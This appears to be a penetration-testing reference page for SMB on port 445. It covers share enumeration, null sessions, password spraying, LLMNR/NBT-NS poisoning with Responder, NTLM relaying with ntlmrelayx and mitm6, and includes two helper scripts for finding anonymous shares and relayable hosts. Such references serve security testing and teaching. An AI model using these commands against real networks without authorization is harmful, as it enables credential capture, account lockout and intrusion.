Notes
| Alternative Ports |
|---|
| 445 TCP (SMB over TCP) |
Service Description
SMB (Server Message Block) over TCP port 445 carries file and printer sharing, named pipes (over which MS-RPC services such as SAMR, LSARPC and SVCCTL are reached for remote management) and NTLM/Kerberos authentication. It is ubiquitous in Windows environments and is also served by Samba on Linux.
Info
The Windows SMB server always listens on TCP 445; the port is not configurable, which makes it a reliable fingerprint for scanning and a reliable target for firewall rules.
Note
Path-based restrictions in HTTP applications running on Windows (e.g., Tomcat) can sometimes be bypassed by supplying a UNC path (\\server\share\file) that the server resolves over SMB; the same request also sends the service account's NTLM authentication to the attacker's SMB listener.
Warning
SMB null sessions (anonymous logons) and misconfigurations can expose domain-level data: user and group lists, share names and contents, password policy and, through readable shares holding scripts or configuration files, credentials or hashes. Anonymous enumeration is blocked by default on current Windows but remains common on Samba and legacy hosts.
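As an added example (not from the original page), the following script enumerates shares over a null session and tests anonymous read access to each one, which is the quickest way to check a host for the exposure described above. It assumes Samba's smbclient is installed; the host 10.10.10.10 and the embedded share listing are constructed sample data.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): enumerate SMB shares over a
# null session and test anonymous read access to each one.
# Assumes `smbclient` from Samba is installed; the host 10.10.10.10 and the
# listing below are constructed for illustration.

# Constructed sample of `smbclient -N -L //10.10.10.10` output.
SAMPLE_LISTING='
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Backups         Disk      Nightly backups
        Dev Share       Disk      Development files
        HP-Lobby        Printer   Lobby printer
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------
'

# parse_shares: read `smbclient -L` output on stdin and print the name of every
# Disk share (hidden admin shares such as C$ included), one per line.
# The Type column is located by matching the literal type words, so share
# names containing spaces ("Dev Share") survive intact.
parse_shares() {
  awk '
    /Sharename[ \t]+Type/              { in_table = 1; next }   # header row
    in_table && /^[ \t]*-+[ \t]+-+/    { next }                 # ---- rule
    in_table && (NF == 0 || /^[^ \t]/) { in_table = 0; next }   # table ended
    in_table && match($0, /[ \t]+(Disk|IPC|Printer)([ \t]+|$)/) {
      name = substr($0, 1, RSTART - 1)
      gsub(/^[ \t]+|[ \t]+$/, "", name)
      type = substr($0, RSTART, RLENGTH)
      gsub(/[ \t]/, "", type)
      if (name != "" && type == "Disk") print name
    }
  '
}

# check_share_access HOST: for each share name on stdin, attempt an anonymous
# directory listing and report READ or NOACCESS (tab separated).
check_share_access() {
  host="$1"
  while IFS= read -r share; do
    if smbclient -N "//${host}/${share}" -c 'ls' >/dev/null 2>&1; then
      printf '%s\tREAD\n' "$share"
    else
      printf '%s\tNOACCESS\n' "$share"
    fi
  done
}

# Offline demonstration on the constructed listing.
printf '%s\n' "$SAMPLE_LISTING" | parse_shares

# Live use only when SMB_TARGET is set, e.g.  SMB_TARGET=10.10.10.10 bash enum_shares.sh
if [ -n "${SMB_TARGET:-}" ]; then
  smbclient -N -L "//${SMB_TARGET}" 2>/dev/null | parse_shares | check_share_access "$SMB_TARGET"
fi
```

On the sample listing parse_shares prints ADMIN$, C$, Backups and Dev Share; IPC$ and the printer are skipped. Against a live host, a READ verdict on C$ or ADMIN$ means anonymous administrative access, which should never happen on a healthy system, and a READ on a user share is where to look for scripts and configuration files containing credentials.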
Tools & Exploits
Enumeration & Access
List Open Shares
smbclient -N -L //10.10.10.10
smbmap -H 10.10.10.10 -u "" -p ""
enum4linux 10.10.10.10
Use the //host/share form (or quote the backslashes) on a Linux shell; an unquoted \\10.10.10.10 is collapsed to \10.10.10.10 by the shell. smbmap's -L lists the host's local drives and needs admin rights; without it smbmap lists shares with the permissions the supplied credentials have.
Connect to Share
smbclient -N //10.10.10.10/[sharename]
smbclient //10.10.10.10/[Share] -U [user] -W [domain]
Mount Share (Linux)
sudo mount.cifs //10.10.10.10/[Share] /mnt/share -o user=[user],domain=[domain],sec=ntlmssp
RID Cycling / SID Enumeration
enum4linux -a -u [user] -p 'Password@123' -w [domain] -r 10.10.10.10
Password Spray
crackmapexec smb 10.10.10.10 --pass-pol
crackmapexec smb 10.10.10.10 -u users.txt -p Password123 --continue-on-success
Read the lockout threshold and observation window first (--pass-pol); spray one password per round across all users and stay below the threshold within the window, otherwise the spray locks out the domain.
Scanner Modules
nmap
nmap -p445 --script smb-enum-shares,smb-enum-users,smb-os-discovery,smb-security-mode,smb2-security-mode,smb2-capabilities 10.10.10.10
smb-security-mode only speaks SMB1; smb2-security-mode reports the signing setting of hosts that have SMB1 disabled.
Metasploit
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_version
Impacket
rpcdump.py @10.10.10.10
smbclient.py [domain]/[user]@10.10.10.10
lookupsid.py [domain]/[user]@10.10.10.10
Responder & Relaying
Responder (LLMNR/NBT-NS Poisoning)
responder -I eth0
Answers LLMNR, NBT-NS and mDNS name queries on the local segment so that clients authenticate to the attacker; captures the resulting NetNTLMv1/v2 challenge-responses for offline cracking (hashcat or john).
NTLM Relaying (ntlmrelayx)
ntlmrelayx.py -tf targets.txt -smb2support
Relays the incoming NTLM authentication, while it is in flight rather than from a captured hash, to SMB targets that do not require signing, giving share access, SAM dumps or command execution with the victim's privileges. Disable Responder's own SMB and HTTP servers (Responder.conf: SMB = Off, HTTP = Off) so the connections reach ntlmrelayx, and list only hosts that do not enforce SMB signing in targets.txt.
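The nmap signing scripts and the relay target file above belong together: relaying succeeds only against hosts that do not require signing. As an added example (not from the original page), this script reads nmap normal output (-oN) from the smb2-security-mode and smb-security-mode scripts and writes one ntlmrelayx target line per relayable host. The hosts and scan output are constructed sample data.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): turn an nmap scan of SMB
# signing settings into a target list for ntlmrelayx. Relaying only works
# against hosts that do not require signing, so only those are kept.
# Assumes nmap was run with -oN and the smb2-security-mode and/or
# smb-security-mode scripts; the hosts and output below are constructed.

# Constructed sample of
# `nmap -p445 --script smb2-security-mode,smb-security-mode -oN smb-signing.nmap ...`
SAMPLE_NMAP='
Nmap scan report for 10.10.10.10
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for dc01.corp.local (10.10.10.11)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.12
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Nmap scan report for 10.10.10.13
Host is up (0.0030s latency).

PORT    STATE SERVICE
445/tcp filtered microsoft-ds
'

# relay_targets: read nmap normal output on stdin and print "smb://IP" for
# every host whose signing verdict is not "required". A host is kept only if
# at least one signing line was seen (filtered/closed hosts are skipped) and
# dropped if any script reports signing as required.
relay_targets() {
  awk '
    function flush() {
      if (ip != "" && seen && !required) print "smb://" ip
      ip = ""; seen = 0; required = 0
    }
    /^Nmap scan report for / {
      flush()
      ip = $NF                  # last word is "1.2.3.4" or "(1.2.3.4)"
      gsub(/[()]/, "", ip)
      next
    }
    /[Mm]essage[ _][Ss]igning/ {
      line = tolower($0); seen = 1
      if (line ~ /required/ && line !~ /not required/) required = 1
    }
    END { flush() }
  '
}

# Offline demonstration on the constructed scan.
printf '%s\n' "$SAMPLE_NMAP" | relay_targets

# Live use (assumed workflow, not executed here):
#   nmap -p445 --script smb2-security-mode,smb-security-mode -oN smb-signing.nmap 10.10.10.0/24
#   relay_targets < smb-signing.nmap > targets.txt
#   ntlmrelayx.py -tf targets.txt -smb2support
```

On the sample scan the output is smb://10.10.10.10 and smb://10.10.10.12; the domain controller, which requires signing, and the filtered host are dropped. Two caveats when using the list: an authentication cannot be relayed back to the host it came from, so remove the source of each capture from targets.txt, and the same verdict can be cross-checked with crackmapexec smb [range] --gen-relay-list targets.txt.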
mitm6 (IPv6 spoofing for relay setup)
mitm6 -i eth0
Answers DHCPv6 requests so that Windows clients (which prefer IPv6) adopt the attacker as their DNS server, then spoofs DNS replies such as WPAD to steer authentication to the attacker. It is normally paired with ntlmrelayx (-6 and -wh options) rather than with Responder.
Proxychains (relay via pivot)
proxychains responder -I tun0
proxychains ntlmrelayx.py -tf targets.txt -smb2support
proxychains only wraps outbound TCP connections, so it carries ntlmrelayx's relay connections to the targets through a SOCKS pivot; the victims still have to reach the listeners on the attacker host (for example through a reverse port forward). Responder gains nothing from proxychains, because it sniffs and answers broadcast and multicast name queries on the bound interface, which a SOCKS proxy cannot deliver; run it on the pivot host itself instead.
References
- https://book.hacktricks.wiki/network-services-pentesting/smb-pentesting
- https://learn.microsoft.com/en-us/windows-server/storage/file-server/troubleshoot/detect-enable-and-disable-smbv1-v2-v3?tabs=server
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing
- https://github.com/dirkjanm/mitm6
- https://github.com/fox-it/ntlmrelayx
- https://github.com/lgandx/Responder